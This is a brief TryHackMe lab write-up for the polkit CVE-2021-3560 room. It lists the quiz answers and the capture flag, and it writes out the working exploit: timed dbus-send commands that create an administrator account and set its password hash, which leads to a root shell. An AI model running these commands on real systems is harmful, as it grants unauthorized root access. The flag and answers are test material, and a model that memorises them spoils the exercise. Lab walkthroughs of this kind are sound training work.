Polkit: CVE-2021-3560

THM Room https://tryhackme.com/room/polkit

    • Click the green "Start Machine" button to deploy the machine!

    No Answer

    • What is the URL of the website you should submit dynamic flags to?

    Answer : https://flag.muir.land/

    • In what version of Ubuntu's policykit-1 is CVE-2021-3560 patched?

    Answer : 0.105-26ubuntu1.1

    • What program can we use to run commands as other users via polkit?

     Answer : pkexec

    • Read the information above

    No Answer.

    TASK 5 : Practical Do it for yourself! 

    • Root Flag

    Using the following steps as explained in the task :

    time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1

    This gives us the time for the execution +/- 11 ms so break it after 5 ms :

    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:attacker string:"Pentester Account" int32:1 & sleep 0.005s; kill $!

    We need to do the same message for ddbus with the password hash we generated :

    dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedeskt
    op/Accounts/User1002 org.freedesktop.Accounts.User.SetPassword string:'$6$97K8LUgOaabpqA5Z$u5s5mH9fyGvw9/FtW62A0mmE.wH
    O1Pl.MTLFlx60PqZSLax5zOAyWiylmuMxE.8Odm3Gwpy645ldoYbwsl8Jn/' string:"ask the pentester" & sleep 0.005s; kill $!

    I need 3 try to get it correctly because of mispelling the request :


    We can now go into root shell :


    And go to the dynamic flag website from Muiri to get the fully flag :


    Answer : THM{N2I0MTgzZTE4ZWQ0OGY0NjdiNTQ0NTZi}